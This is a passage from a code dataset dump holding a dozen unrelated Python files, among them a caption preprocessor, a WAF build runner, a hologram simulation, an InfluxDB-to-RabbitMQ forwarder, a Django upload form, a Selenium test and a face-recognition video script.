self.max_index += 1\n        else:\n            self.word2count[word] += 1\n\n    def add_caption(self, caption):\n        caption = caption.translate(self.translate_map).lower().split()\n\n        if self.caption_shape[0] < len(caption) + self.EXTRA_PADDING:\n            self.caption_shape = [len(caption) + self.EXTRA_PADDING]\n\n        for word in caption:\n            self.add_word(word)\n\n    def add_captions(self, captions):\n        for caption in captions:\n            self.add_caption(caption)\n\n    def encode_word(self, word):\n        encoded_word = self.word2index.get(word, None)\n\n        return encoded_word\n\n    def encode_caption(self, caption):\n        caption = caption.translate(self.translate_map).lower().split()\n\n        encoded_caption = []\n        encoded_caption.append(self.encode_word(self.SOS_TOKEN))\n\n        for word in caption:\n            encoded_word = self.encode_word(word)\n            if encoded_word is not None:\n                encoded_caption.append(encoded_word)\n\n        encoded_caption.append(self.encode_word(self.EOS_TOKEN))\n\n        return encoded_caption\n\n    def encode_captions(self, captions, padding_length):\n        encoded_captions = []\n        for caption in captions:\n            encoded_captions.append(self.encode_caption(caption))\n\n        encoded_captions = pad_sequences(encoded_captions, padding=\"post\", maxlen=padding_length)\n\n        return encoded_captions\n\n    def decode_word(self, encoded_word):\n        pass\n\n    def decode_caption(self, encoded_caption):\n        pass\n\n    def decode_captions(self, encoded_captions):\n        pass\n\n    def preprocess(self, captions):\n        encoded_captions = self.encode_captions(captions, self.caption_shape[0])\n\n        return encoded_captions\n\n    def preprocess_one_hot(self, captions):\n        # label padding of caption_len + 1 since we get X * captions + 1 * image embedding\n        encoded_captions = self.encode_captions(captions, self.caption_shape[0] + 1)\n        encoded_captions = to_categorical(encoded_captions, self.max_index)\n\n        return encoded_captions\n","sub_path":"src/caption_preprocessor.py","file_name":"caption_preprocessor.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"56796708","text":"import os\nimport sys\nimport logging\nimport subprocess\nimport platform\nimport multiprocessing\n\n\nfrom gii.core import Project, app\n\n# WAF_NAME = 'waf-1.9.7'\nWAF_NAME = 'waf-2.0.19'\n\ndef run( **option ):\n\tFNULL = open(os.devnull, 'wb')\n\tproject = app.getProject()\n\tassert project.isLoaded()\n\tos.chdir( project.getHostPath() )\n\t# if option.get( 'clean-bin', False ):\n\t# \tif sys.platform == 'darwin':\n\t# \t\tpass\t\n\t# \telse:\n\t# \t\tpass\n\t# 
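# The hw5_test.py record above thresholds four network outputs at 0.4 and keeps a tag
# when at least 3 of the 5 models (4 nets + 1 sklearn classifier) vote for it. A
# vectorised sketch of that voting step; each probability array is assumed to be
# (n_samples, n_tags) in [0, 1], and all names below are illustrative.
import numpy as np

def majority_vote(prob_arrays, hard_preds, thresh=0.4, min_votes=3):
    # one vote per model whose probability clears the threshold
    votes = sum((p >= thresh).astype(int) for p in prob_arrays)
    votes += sum(hard_preds)  # already-binarised votes, e.g. from the sklearn model
    return (votes >= min_votes).astype(int)

probs = [np.array([[0.9, 0.1]]), np.array([[0.5, 0.3]]),
         np.array([[0.2, 0.6]]), np.array([[0.8, 0.35]])]
hard = [np.array([[1, 0]])]
print(majority_vote(probs, hard))  # -> [[1 0]]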
\t\t#TODO\t\n\t# \treturn 0\n\tbuildEnv = os.environ.copy()\n\tglobalBuildEnv = app.getUserSetting( 'build_env', None )\n\tif globalBuildEnv:\n\t\tfor k, v in globalBuildEnv.items():\n\t\t\tbuildEnv[ k ] = v\n\tprojectBuildEnv = project.getUserSetting( 'build_env', None )\n\tif projectBuildEnv:\n\t\tfor k, v in projectBuildEnv.items():\n\t\t\tbuildEnv[ k ] = v\n\n\tbuildEnv[ 'JOBS' ] = '8'\n\tWAFCmd = [ app.getPythonPath(), app.getPath( 'support/common/%s/waf' % WAF_NAME ) ]\n\tdef callWAF( cmd, *args, **kwargs ):\n\t\tkwargs[ \"env\" ] = buildEnv\n\t\tif isinstance( cmd, list ):\n\t\t\targlist = WAFCmd + cmd + list( args )\n\t\telse:\n\t\t\targlist = WAFCmd + [ cmd ] + list( args )\n\t\treturn subprocess.call( arglist, **kwargs )\n\n\t#check configure\n\t# code = callWAF( 'list', stdout = FNULL, stderr = FNULL )\n\t# if code != 0:\n\t# \tcode = callWAF( 'configure' )\n\t# \tif code != 0:\n\t# \t\tlogging.error( 'cannot configure building ' )\n\t# \t\treturn -1\n\n\t#main body\n\tbuilding = True\n\tcmds = []\n\targs = []\n\t\n\t#misc settings\n\tif option.get( 'verbose', False ):\n\t\targs.append( '-v' )\n\n\targs.append( '-j%d' % max( 2, multiprocessing.cpu_count()) )\n\t#configure\n\tif option.get( 'configure', False ):\n\t\treturn callWAF( 'configure', *args )\n\n\t#commands\n\tif option.get( 'clean', False ):\n\t\tcmds += [ 'clean' ]\n\n\tif option.get( 'dist', False ):\n\t\tcmds += [ 'dist' ]\n\n\tif option.get( 'project', False ):\n\t\tcmds += [ 'project' ]\n\n\telse:\n\t\tif option.get( 'build', True ):\n\t\t\tcmds += [ 'build' ]\n\n\t\tif option.get( 'install', True ):\n\t\t\tcmds += [ 'install' ]\n\n\n\ttargets = option.get( 'targets', [ 'host' ] )\t\t\n\n\tif isinstance( targets, str ):\n\t\ttargets = [ targets ]\n\n\t#expand native\n\tif 'host' in targets:\n\t\ttargets.remove( 'host' )\n\t\tif platform.system() == 'Darwin':\n\t\t\tif not ( 'osx' in targets ):\n\t\t\t\ttargets.append( 'osx' )\n\t\t\t\t\n\t\telif platform.system() == 'Windows':\n\t\t\tif not ( 'win' in targets ):\n\t\t\t\ttargets.append( 'win' )\n\n\t\telif platform.system() == 'Linux':\n\t\t\tif not ( 'linux' in targets ):\n\t\t\t\ttargets.append( 'linux' )\n\n\tif 'native' in targets:\n\t\ttargets.remove( 'native' )\n\t\tif platform.system() == 'Darwin':\n\t\t\tif not ( 'osx' in targets ):\n\t\t\t\ttargets.append( 'osx' )\n\t\t\tif not ( 'python' in targets ):\n\t\t\t\ttargets.append( 'python' )\n\t\t\t\t\n\t\telif platform.system() == 'Windows':\n\t\t\tif not ( 'win' in targets ):\n\t\t\t\ttargets.append( 'win' )\n\t\t\tif not ( 'python' in targets ):\n\t\t\t\ttargets.append( 'python' )\n\n\t\telif platform.system() == 'Linux':\n\t\t\tif not ( 'linux' in targets ):\n\t\t\t\ttargets.append( 'linux' )\n\n\tbuild_type = option.get( 'build_type', 'debug' )\n\n\tcmdList = []\n\tfor target in targets:\n\t\tcontextName = '%s-%s' % ( target, build_type )\n\t\tsuffix = '-' + contextName\n\t\tfor cmd in cmds:\n\t\t\tcmdList += [ cmd + suffix ]\n\tprint( cmdList )\n\treturn callWAF( cmdList, *args )\n","sub_path":"lib/gii/core/tools/Build.py","file_name":"Build.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"372972287","text":"#!/usr/bin/env python3\nimport cv2\nimport numpy as np\n\ndef draw_circles(img, n=15):\n \n # declare parameters\n wv = 405; # laser wavelength (nm)\n pixel_size = 0.5;\n fs = 1/pixel_size;\n \n # size of imaging plane in image and frequency domain\n nx, ny = np.shape(img);\n low = -fs/2;\n highx = 
fs/2 * ((nx-2)/nx) ;\n highy = fs/2 * ((ny-2)/ny) ;\n \n # circle positioning and sizing\n x = np.random.choice(nx, n).reshape((n, 1));\n y = np.random.choice(ny, n).reshape((n, 1));\n r = np.random.uniform(0.8, 1.5, n).reshape((n, 1));\n \n # phase shift\n phase = np.random.uniform(0.25, 0.75, n) / (2*np.pi);\n phase = phase.reshape((n, 1));\n \n # complex optical wavefront I(x,y)\n M = np.concatenate((x, y, np.round(r / pixel_size).astype(int), phase), axis=1);\n M = np.concatenate((M, np.exp(M[:,2] * 2j * np.pi).reshape(n, 1)), axis=1);\n \n # draw circles\n for i in range(n):\n cv2.circle(img, (int(y[i]), int(x[i])), radius=int((np.round(r[i] / pixel_size))), color=255, thickness=-1);\n img[img == 0] = 1;\n\n # fourier transform\n ft = np.fft.fftshift(np.fft.fft2(np.fft.ifftshift(img)));\n ft2 = np.fft.fft2(img);\n \n print(np.log10(abs(ft)).shape, np.max(np.log10(abs(ft))), np.min(np.log10(abs(ft))));\n \n # fourier output for return\n fourierimg = (np.log10(abs(ft)) - np.min(np.log10(abs(ft))))/(np.max(np.log10(abs(ft))) - np.min(np.log10(abs(ft)))) * 255\n fourierimg2 = (np.log10(abs(ft2)) - np.min(np.log10(abs(ft2))))/(np.max(np.log10(abs(ft2))) - np.min(np.log10(abs(ft2)))) * 255\n # -------------------------------------\n\n # frequency coordinates\n kx = np.linspace(low,highx,nx)\n ky = np.linspace(low,highy,ny)\n \n # z distance sampling\n z_0 = np.random.uniform(800,2400);\n \n # transfer function\n trans = np.exp(z_0*1j*np.sqrt((2*np.pi*wv)**2 - kx**2 - ky**2))\n \n # intensity @ image sensor (convolution)\n I = trans * ft;\n I2 = trans * ft2;\n\n # inverse fourier to get image\n ift = np.fft.ifftshift(np.fft.ifft2(np.fft.fftshift(I)));\n ift2 = np.fft.ifft2(I2);\n \n # image sensor output (I_z0(x,y))\n Iimg = (np.log10(abs(ift)) - np.min(np.log10(abs(ift))))/(np.max(np.log10(abs(ift))) - np.min(np.log10(abs(ift)))) * 255\n Iimg2 = (np.log10(abs(ift2)) - np.min(np.log10(abs(ift2))))/(np.max(np.log10(abs(ift2))) - np.min(np.log10(abs(ift2)))) * 255 \n # generate noise: N(0,[0.0125,0.03125])\n noise = np.random.normal(0,np.random.uniform(0.0125, 0.03125, 1), (nx, ny)) * 255\n \n # final image sensory output + noise (H(x,y))\n H = np.abs(Iimg) + noise\n H2 = np.abs(Iimg2) + noise\n \n return img, fourierimg, fourierimg2, H, H2;\n\ndef main():\n img = np.zeros((1000, 1000));\n cv2.imwrite('base.png', img);\n img = cv2.imread('base.png', cv2.IMREAD_COLOR);\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) / 255.0\n\n img, fourier, fourier2, H, H2 = draw_circles(img)\n \n img = cv2.imwrite('circles_drawn.png', img);\n fourier = cv2.imwrite('fourier.png', fourier)\n fourier2 = cv2.imwrite('fourier2.png', fourier2)\n H = cv2.imwrite('image.png', H)\n H2 = cv2.imwrite('image2.png', H2)\n \nmain();","sub_path":"initial-attempts/.ipynb_checkpoints/circledrawHaHa-checkpoint.py","file_name":"circledrawHaHa-checkpoint.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"145252793","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 12 14:37:02 2020\n\n@author: shruti\n\"\"\"\n\nfrom am_analysis import am_analysis as ama\nimport numpy as np\nimport matplotlib.pyplot as plt \n#put breathing data here as a numpy array\nimport pandas as pd\nfrom scipy import signal\n\n\n# label = pd.read_csv('/home/shruti/Downloads/Master_list.csv', header=0)\n# l = np.array(label)\n# print(l.shape[0])\n# l1 = l[:,3]\n# l2 = l[:,9]\n\n# for i in range(x.shape[0]):\n# #print(X[i])\n# if 
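# A compact angular-spectrum propagation sketch related to the hologram record above.
# Note the textbook transfer function uses k = 2*pi/lambda, i.e.
# sqrt((2*pi/wv)**2 - kx**2 - ky**2); the record writes (2*np.pi*wv)**2, which looks
# like a slip. Grid size, wavelength and distance below are illustrative.
import numpy as np

def angular_spectrum_propagate(field, pixel_size, wavelength, z):
    ny, nx = field.shape
    kx = np.fft.fftfreq(nx, d=pixel_size) * 2 * np.pi   # angular spatial frequencies
    ky = np.fft.fftfreq(ny, d=pixel_size) * 2 * np.pi
    KX, KY = np.meshgrid(kx, ky)
    kz_sq = (2 * np.pi / wavelength) ** 2 - KX ** 2 - KY ** 2
    kz = np.sqrt(np.maximum(kz_sq, 0))                  # drop evanescent components
    H = np.exp(1j * z * kz)                             # free-space transfer function
    return np.fft.ifft2(np.fft.fft2(field) * H)

out = angular_spectrum_propagate(np.ones((256, 256)), pixel_size=0.5, wavelength=0.405, z=1000)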
l1[i]>0.45 or l2[i]==Day shift:\n\nimport os\nimport pandas as pd\n#output_fin=np.empty((0,12))\noutput_cols=['bnd_pwr_0_25','bnd_pwr_25_50','bnd_pwr_50_150','entropy','p1_p2','p1_p3','kurt','sknew','flatness','peak_f','ratio_25', 'ratio_50','ratio_150','perm_ent', 'filename', 'labels']\n#load master list data\ninfo_csv='/home/shruti/Downloads/Master_list.csv'\ndf_info=pd.read_csv(info_csv)[['participant_id','Shift Info','sex']]\npath = '/media/shruti/Data/Breathing_project/mask/mask_3_019/'\nif not os.path.exists(path):\n os.makedirs(path)\n#iterate over dataframes\nfor idx,row in df_info.iterrows():\n\t#get a subject , its shift and sex information\n sub_nm,shift,sex=str(row['participant_id']),str(row['Shift Info']),str(row['sex'])\n print(sub_nm,shift,sex)\n file_path='/media/shruti/Data/Breathing_project/Tiles/br_fts/'+sub_nm+'.csv'\n print('name',file_path)\n \n # df_br=pd.read_csv(file_path)\n try:\n x = pd.read_csv(file_path)\n cols=x.columns.values.tolist()\n print(cols)\n except:\n continue\n # x = np.array(x)\n # print(x.shape)\n X1 = x['bnd_pwr_25_50']\n X1 = np.array(X1)\n X1 = X1[:,None]\n print(X1.shape)\n X2 = x['peak_f']\n X2 = np.array(X2)\n X2 = X2[:,None]\n print(X2.shape)\n X3 = x[ 'entropy']\n X3 = np.array(X3)\n X3 = X3[:,None]\n print(X3.shape)\n X4 = x[ 'bnd_pwr_0_25']\n X4 = np.array(X4)\n X4 = X4[:,None]\n print(X4.shape)\n x_new = np.array(x)\n print(x_new.shape[0])\n # X = x['':, 1'']\n # X = X.squeeze()\n # X = X[:, None]\n # #print(X.shape[0])\n # X2 = x[:, -6]\n # X2= X2.squeeze()\n # X2 = X2[:, None]\n # X3 = x[:, 3]\n # X3 = X.squeeze()\n # X3 = X[:, None]\n \n Y_test =[]\n \n for i in range(x_new.shape[0]):\n \n # if X1[i]>0.45 and X2[i]>0.25 and X3[i]<1.7:\n #if X1[i]>0.45:\n #if X2[i]>0.25:\n # if X3[i]<1.7:\n if X1[i]>0.55 and X2[i]>0.25 and X4[i]<0.2:\n #if X2[i]>0.25:\n Y_test.append(0)\n else:\n Y_test.append(1)\n \n \n Y = np.asarray(Y_test)\n Y = Y[:, None]\n print('labels', Y.shape)\n out_vec=np.hstack((x_new, Y))\n print(out_vec.shape)\n df=pd.DataFrame(out_vec, columns=output_cols)\n df.to_csv(path+sub_nm+'.csv' ,index=None)\n\n","sub_path":"mask_PSD.py","file_name":"mask_PSD.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"201458132","text":"# reading the file \n\nmy_file = open(\"zoo.csv\",\"rt\")\n\n# reading the content of zoo.csv file \nread_files = my_file.readlines()\n\n# printing the file content in vertically\nfor i in read_files:\n new_file= list(i.split(\",\"))\n if new_file[0]==\"elephant\":\n sec_new= new_file[2]\n print (sec_new.split()) \n\n# closing the file\nmy_file.close()\n\n\n\n","sub_path":"day_2/printing_zoo_file_through_python.py","file_name":"printing_zoo_file_through_python.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"298034927","text":"import numpy as np\r\nimport cv2\r\nfrom matplotlib import pyplot as plt\r\n\r\nimg = cv2.imread(\"flower.png\")\r\n\r\n#converting from bgr to L*a*b*\r\nhs = cv2.cvtColor(img, cv2.COLOR_BGR2Lab)\r\n#split the image into planes\r\nL,a,b = cv2.split(hs)\r\n\r\n#create a copy of each L,a,b numpy arrays\r\nL1 = np.copy(L)\r\na1 = np.copy(a)\r\nb1 = np.copy(b)\r\n\r\n#fill the L,a,b copy values to constant for displaying in color format\r\nL1.fill(127)\r\na1.fill(128)\r\nb1.fill(128)\r\nLt = cv2.cvtColor(cv2.merge([L,a1,b1]), cv2.COLOR_Lab2RGB)\r\n\r\n#display the images in RGB form as 
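# The mask_PSD.py record above turns three spectral features into a binary label with a
# hand-tuned rule (bnd_pwr_25_50 > 0.55 and peak_f > 0.25 and bnd_pwr_0_25 < 0.2 -> 0,
# else 1). The same rule as one vectorised expression; the two-row frame is synthetic.
import numpy as np
import pandas as pd

df = pd.DataFrame({"bnd_pwr_25_50": [0.6, 0.1], "peak_f": [0.3, 0.3], "bnd_pwr_0_25": [0.1, 0.5]})
mask_on = (df["bnd_pwr_25_50"] > 0.55) & (df["peak_f"] > 0.25) & (df["bnd_pwr_0_25"] < 0.2)
df["labels"] = np.where(mask_on, 0, 1)
print(df)  # row 0 -> 0, row 1 -> 1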
matplotlib requires images in RGB\r\nplt.figure(1)\r\nplt.subplot(221)\r\nplt.imshow(cv2.cvtColor(img,cv2.COLOR_BGR2RGB))\r\nplt.title('original')\r\nplt.subplot(222)\r\nplt.imshow(Lt)\r\nplt.title('L*')\r\nplt.subplot(223)\r\nplt.imshow(cv2.cvtColor(cv2.merge([L1,a,b1]), cv2.COLOR_Lab2RGB))\r\nplt.title('a*')\r\nplt.subplot(224)\r\nplt.imshow(cv2.cvtColor(cv2.merge([L1,a1,b]), cv2.COLOR_Lab2RGB))\r\nplt.title('b*')\r\nplt.show()\r\n","sub_path":"assignment 1/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"346726704","text":"from influxdb import InfluxDBClient\nimport pika\nimport sys\nimport json\nimport time\n\n\n# declarations--------------------\nclient = InfluxDBClient(host='localhost', port=8086)\nclient.create_database('ftest')\nclient.switch_database('ftest')\n#client.create_retention_policy('onehr','1h',1, default=True)\n#run one time only\n#client.query(\"CREATE CONTINUOUS QUERY maxtemp_cq ON ftest RESAMPLE EVERY 10s BEGIN SELECT max(temp) as temp, x_axis, y_axis, z_axis, carId INTO ftest.onehr.newcar FROM ftest.oneday.car GROUP BY time(30s) END\")\n\n#def send_data_to_server(data):\ncred=pika.PlainCredentials('admin', 'password')\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='HOST IP',credentials=cred))\nprint(\"connection-\",connection)\nchannel = connection.channel()\nchannel.queue_declare(queue='local_queue', durable=True)\n\n\n\n# code----------------------------\n\ndef read_from_db():\n print(\"----------------------\\nin read from db\")\n client.switch_database('ftest')\n client.query(\"alter retention policy onehr on ftest duration 1h replication 1 default\")\n rs = client.query(\"SELECT * from newcar\")\n #print(\"\\n\\nrs----\",rs,\"\\n\\n\")\n points =list(rs.get_points(measurement='newcar', tags={'carId': '123456'}))\n top_item=(len(points)-1)\n print(\"\\npoints od top---->\",points[top_item])\n #print(\"type\",type(points[0])) #should be dict\n carId=points[top_item]['carId']\n temp=points[top_item]['temp']\n Xaxis=points[top_item]['x_axis']\n Yaxis=points[top_item]['y_axis']\n Zaxis=points[top_item]['z_axis']\n json_send={\n \"measurement\":\"car\",\n \"tags\":{\n \"carId\":carId\n },\n \"fields\":{\n \"temp\":float(temp),\n \"x_axis\":int(Xaxis),\n \"y_axis\":int(Yaxis),\n \"z_axis\":int(Zaxis)\n }\n }\n print(\"return from influx-\",json_send)\n return(json_send)\n\n\ndef send_data_to_server(data):\n print(\"\\nsend_data_to_server\",data)\n res=channel.basic_publish(exchange='',\n routing_key='local_queue',\n #data should be of dict type\n body=json.dumps(data),\n properties=pika.BasicProperties(\n delivery_mode = 2, # make message persistent\n ))\n print(res)\n\n#connection.close()\n#send_data_to_server(\"hey\")\n\n\n\nwhile True:\n time.sleep(10)\n data = read_from_db()\n print(\"\\nread from db-\\n\", data)\n send_data_to_server(data)\n\n","sub_path":"Raspberry-Pi/DBtoServer.py","file_name":"DBtoServer.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"653335405","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\n\nfrom .models import UploadFile, User\n\n\nclass FileUploadModelForm(forms.ModelForm):\n class Meta:\n model = UploadFile\n fields = ('uploadFile', 'uploadUrl', 'uploadOperator')\n widgets = {\n 'uploadUrl': forms.TextInput(attrs={'class': 'form-control'}),\n 
'uploadOperator': forms.TextInput(attrs={'class': 'form-control'}),\n            'uploadFile': forms.ClearableFileInput(attrs={'class': 'form-control'}),\n        }\n\n    def clean(self):\n        file = super().clean().get('uploadFile')\n        ext = file.name.split('.')[-1].lower()\n\n        if ext not in [\"txt\", \"csv\", \"xlsx\"]:\n            raise forms.ValidationError(\"Only files of the following types may be uploaded: txt, csv and xlsx.\")\n        # return cleaned data is very important.\n        return super().clean()\n\n\nclass RegisterForm(UserCreationForm):\n    class Meta(UserCreationForm.Meta):\n        model = User\n        fields = (\"username\", \"nick_name\", \"email\")\n","sub_path":"databaseDemo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"224232214","text":"# coding=utf-8\n# Time: 2019-10-21-16:58 \n# Author: dongshichao\n\n'''\nWe call a number X a good number if, after each of its digits is rotated by 180 degrees,\nthe result is still a valid number that differs from X. Every digit must be rotated.\n\nA number is valid if every digit is still a digit after rotation. 0, 1 and 8 rotate to\nthemselves; 2 and 5 rotate into each other; likewise 6 and 9. Every other digit becomes\ninvalid after rotation.\n\nGiven a positive integer N, count how many numbers X from 1 to N are good.\n\nExample:\nInput: 10\nOutput: 4\nExplanation:\nThere are four good numbers in [1, 10]: 2, 5, 6, 9.\nNote that 1 and 10 are not good numbers, because rotation leaves them unchanged.\n\nApproach:\nA good number must contain at least one of 2, 5, 6, 9\nand must not contain any of 3, 4, 7.\n'''\n\nclass Solution(object):\n    def rotatedDigits(self, N):\n        \"\"\"\n        :type N: int\n        :rtype: int\n        \"\"\"\n        res = 0\n        for i in range(N+1):\n            s = str(i)\n            if (\"3\" not in s and '4' not in s and '7' not in s) and ('2' in s or '5' in s or '6' in s or '9' in s):\n                res += 1\n        return res\n\n\n","sub_path":"string/rotatedDigits.py","file_name":"rotatedDigits.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"280169006","text":"# (C) Datadog, Inc. 
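# A quick sanity check for the rotatedDigits record above: a number is "good" iff it
# contains none of {3, 4, 7} and at least one of {2, 5, 6, 9} (0, 1, 8 rotate to
# themselves). Set arithmetic makes the rule explicit.
def is_good(n):
    digits = set(str(n))
    return not (digits & {'3', '4', '7'}) and bool(digits & {'2', '5', '6', '9'})

assert [x for x in range(1, 11) if is_good(x)] == [2, 5, 6, 9]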
2020-present\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\n\nimport re\nfrom collections import deque\n\nimport markdown\nfrom markdown.blockprocessors import ReferenceProcessor\n\nfrom ....utils import get_parent_dir, path_join\nfrom ..core import BaseSpec\nfrom ..templates import BaseTemplate\nfrom .spec import spec_validator\n\n# Match markdown reference links - [text][number-ref]\n# the `?` after `[\\s\\S]+` will match lazily vs greedily\nMATCH_REF = re.compile(r\"(\\[[\\s\\S]+?\\])\\s*(\\[\\d+\\])\")\n\n\nclass DocsTemplates(BaseTemplate):\n TEMPLATES_DIR = path_join(get_parent_dir(get_parent_dir(get_parent_dir(__file__))), 'templates', 'docs')\n\n\nclass DocsSpec(BaseSpec):\n def __init__(self, contents, template_paths=None, source=None, version=None):\n super().__init__(contents, template_paths, source, version)\n\n self.spec_type = 'Docs'\n self.templates = DocsTemplates(template_paths)\n\n def validate(self):\n spec_validator(self.data, self)\n if self.errors:\n return\n self.normalize_links()\n\n def normalize_links(self):\n \"\"\"Translate all reference-style links to inline links.\"\"\"\n # Markdown doc reference: https://www.markdownguide.org/basic-syntax/#links\n\n for fidx, file in enumerate(self.data['files'], 1):\n sections = deque(enumerate(file['sections'], 1))\n while sections:\n sidx, section = sections.popleft()\n section['prepend_text'] = self._normalize(section['prepend_text'], fidx, sidx)\n section['description'] = self._normalize(section['description'], fidx, sidx)\n section['append_text'] = self._normalize(section['append_text'], fidx, sidx)\n if 'sections' in section:\n nested_sections = [\n (f'{sidx}.{subidx}', subsection) for subidx, subsection in enumerate(section['sections'], 1)\n ]\n # extend left backwards for correct order of sections\n sections.extendleft(nested_sections[::-1])\n\n def _normalize(self, text, fidx, sidx):\n # use the markdown internal processor class to extract all references into a dict\n m = markdown.Markdown()\n\n def process_references(txt):\n blocks = [txt]\n while ReferenceProcessor(m.parser).run(None, blocks):\n blocks = ['\\n'.join(blocks)]\n return blocks[0], m.parser.md.references\n\n p, refs = process_references(text)\n\n # test that we extracted appropriately\n matches = MATCH_REF.findall(p)\n if len(matches) != len(refs):\n # attach validation error\n err = (\n f'In file #{fidx}, section #{sidx}: found {len(matches)} reference links, '\n f'but extracted {len(refs)} references.'\n )\n self.errors.append(err)\n return text\n\n # Translate refs to text that is directly replacable\n # {'1': ('https://datadoghq.com', None),\n # '2': ('https://google.com', \"Google Link\")}\n\n # To:\n # {'[1]': '(https://datadoghq.com)',\n # '[2]': '(https://google.com \"Google Link\")'}\n inline_links = {}\n for k, v in refs.items():\n link = v[0]\n if v[1] is not None:\n link += f'\"{v[1]}\"'\n inline_links[f'[{k}]'] = f'({link})'\n\n inline_md = MATCH_REF.sub(lambda x: '{}{}'.format(x.group(1), inline_links[x.group(2)]), p)\n return inline_md\n","sub_path":"datadog_checks_dev/datadog_checks/dev/tooling/specs/docs/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"56796674","text":"# -*- coding:utf-8 -*-\nimport time\nimport unittest\nimport datetime\nfrom AutoFramework.testobject.comm_obj import NavigateObj, LoginOutObj\nfrom AutoFramework.utils.configReader import YamlReader, 
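# A standalone illustration of the reference-link regex in the Datadog record above:
# MATCH_REF pairs "[text][n]" markdown reference links so they can be rewritten inline.
# The regex is copied from the record; the sample text and reference table are made up.
import re

MATCH_REF = re.compile(r"(\[[\s\S]+?\])\s*(\[\d+\])")
refs = {'[1]': '(https://datadoghq.com)'}
text = "See the [Datadog docs][1] for details."
print(MATCH_REF.sub(lambda m: m.group(1) + refs[m.group(2)], text))
# -> See the [Datadog docs](https://datadoghq.com) for details.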
getDriver\nfrom AutoFramework.testobject.module_dataFill_overall_obj import Moudle_dataFill_overall_hotel_monthFill\n\n\nclass Test_overall_hotel_monthFill(unittest.TestCase):\n \"\"\"\n 酒店月填报-填报功能验证\n \"\"\"\n\n def setUp(self):\n self.d = getDriver()\n self.d.get(YamlReader().data['global']['corp']['url'])\n self.login = LoginOutObj(self.d)\n self.mdObj = Moudle_dataFill_overall_hotel_monthFill(self.d)\n self.naviObj = NavigateObj(self.d)\n self.login.Login(YamlReader().data['global']['corp']['user'], YamlReader().data['global']['corp']['pass'])\n\n def Test_overall_hotel_dailyFill(self):\n \"\"\"\n 酒店月填报-填报功能验证\n \"\"\"\n # 点击数据管理\n self.naviObj.click_dataManagement()\n # 点击数据填报\n self.naviObj.click_dataFill()\n # 点击综合产业\n self.naviObj.click_overall()\n # 点击填报\n self.naviObj.click_dataFill_overall_fill()\n # 点击酒店月填报\n self.naviObj.click_dataFill_overall_fill_hotel_monthFill()\n time.sleep(2)\n # 判断填报是否已填写,若未全部填写则填写未填写部分,若全都被填写则填写上一年\n for i in range(50):\n now = datetime.datetime.now()\n year = datetime.datetime.strftime(now, \"%Y\")\n self.mdObj.js_execute(self.mdObj.js)\n self.mdObj.input_yValue(int(year) - i * 1)\n self.mdObj.click_search()\n time.sleep(1)\n if self.mdObj.isClickable(self.mdObj.saveButton):\n for e in self.mdObj.eList:\n if self.mdObj.getAttribute(e, 'readonly') == 'true':\n self.mdObj.getLogger.info(\"{},已被填写\".format(e))\n else:\n self.mdObj.type(1, e)\n self.mdObj.getLogger(\"{},正在填写\".format(e))\n self.mdObj.click_saveButton()\n self.mdObj.click_submitButton()\n break\n else:\n continue\n\n def tearDown(self):\n self.d.close()\n","sub_path":"AutoFramework/testcase/test_dataFill_overall_hotel_monthFill_01_Fill.py","file_name":"test_dataFill_overall_hotel_monthFill_01_Fill.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"353092961","text":"import cv2\r\nimport face_recognition\r\n\r\nfrom infer import get_model, inference\r\n\r\ninference_args = get_model('face_vector')\r\nnew_inference_args = get_model()\r\n\r\n\r\ndef crop_face(img, location):\r\n top, right, bottom, left = location\r\n img = img[top:bottom, left:right]\r\n\r\n cv2.imwrite(f'capture/detect_face.jpg', img)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n return img\r\n\r\n\r\nframe_rate = 30\r\nflip = 0\r\nwidth = 1080\r\nheight = 1080\r\nadjust = 100\r\n\r\nfourcc = cv2.VideoWriter_fourcc(*'DIVX')\r\nout_video = cv2.VideoWriter('capture/out.avi', fourcc, frame_rate, (width, height))\r\n\r\nvideo_file = 'videos/sanhak.mp4'\r\n\r\ncap = cv2.VideoCapture(video_file, cv2.IMREAD_GRAYSCALE)\r\ni = 0\r\nif cap.isOpened():\r\n while True:\r\n ret, img = cap.read()\r\n print('.',end='')\r\n if i > 240:\r\n inference_args = new_inference_args\r\n if ret:\r\n location = face_recognition.face_locations(img, model='hog') # top, right, bottom, left\r\n if len(location) != 0:\r\n location = location[0]\r\n\r\n face_image = crop_face(img, location)\r\n best_prob, idx, ans = inference(face_image, *inference_args)\r\n\r\n cv2.rectangle(img, (location[3], location[0]), (location[1], location[2]), (0, 0, 255), 2)\r\n if ans != \"\":\r\n cv2.putText(img, f'{ans}', (location[3], location[2] + 